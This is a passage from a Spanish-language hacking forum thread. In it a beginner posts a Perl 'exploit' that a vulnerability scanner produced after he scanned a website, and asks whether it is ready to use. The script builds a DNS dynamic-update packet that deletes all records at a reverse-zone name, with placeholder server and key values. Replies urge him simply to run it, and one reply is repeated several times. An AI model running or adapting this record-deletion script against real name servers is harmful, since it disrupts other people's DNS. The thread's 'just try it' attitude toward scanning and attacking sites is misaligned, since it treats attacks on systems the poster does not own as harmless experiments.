Weenas INDETECTABLES, hace unas semanas saliendo un poco de lo basico empeze a meterme en lo que es exploit y sus tantas formas de explotar vulnerabilidades o aprobechar bug's.
Bueno despues de leer un poco, para entender mas use el SSS (Shadow Secutity Scanner) escanee una web y una ves encontrada las vulnerabilidades te da los exploit:
Exploit en perl: quiero saber si el exploit que me da ya esta listo para compilar y usar o se debe modificar o hacer algo mas
#!/usr/bin/perl -w
use Net::DNS;
our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';
my $rzone = '<zone>';
my $rptr = "1.$rzone";
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);
$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
Perdon si parece una pregunta muy ignorante
Que tal, primero que nada creo que esto va a dudas y preguntas xD
Luego dale pues compilalo, por que no lo pruebas? si no funciona pues ya vienes con dudas, la mayoria de los exploits estan listos para compilarlos....
Pero vamos quien compila una porqueria de esas... La idea es usar un interprete compilar es perdida de tiempo! xD
Compilalo y pruebalo y tu mismo nos dices si te funciono o no vale?
Tip: Instala active perl en tu windows, ve al cmd.exe y ve a donde esta el exploit.pl
despues haces la peticion de interpretacion a perl te evitaras estar compilando y de paso aprendes un poco de el sistema, perl y comandos... xD
Luego dale pues compilalo, por que no lo pruebas? si no funciona pues ya vienes con dudas, la mayoria de los exploits estan listos para compilarlos....
Pero vamos quien compila una porqueria de esas... La idea es usar un interprete compilar es perdida de tiempo! xD
Compilalo y pruebalo y tu mismo nos dices si te funciono o no vale?
Tip: Instala active perl en tu windows, ve al cmd.exe y ve a donde esta el exploit.pl
despues haces la peticion de interpretacion a perl te evitaras estar compilando y de paso aprendes un poco de el sistema, perl y comandos... xD
1337 & culture!
WTF ¿?, no entiendo tu concepto de compilar y tampoco entendí "te evitaras estar compilando", perl es interpretado no se compila xD, se interpreta solamente...juhscr escribió:Que tal, primero que nada creo que esto va a dudas y preguntas xD
Luego dale pues compilalo, por que no lo pruebas? si no funciona pues ya vienes con dudas, la mayoria de los exploits estan listos para compilarlos....
Pero vamos quien compila una porqueria de esas... La idea es usar un interprete compilar es perdida de tiempo! xD
Compilalo y pruebalo y tu mismo nos dices si te funciono o no vale?
Tip: Instala active perl en tu windows, ve al cmd.exe y ve a donde esta el exploit.pl
despues haces la peticion de interpretacion a perl te evitaras estar compilando y de paso aprendes un poco de el sistema, perl y comandos... xD
Respecto a tu duda ehjnms
Código: Seleccionar todo
our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';//mHmm..
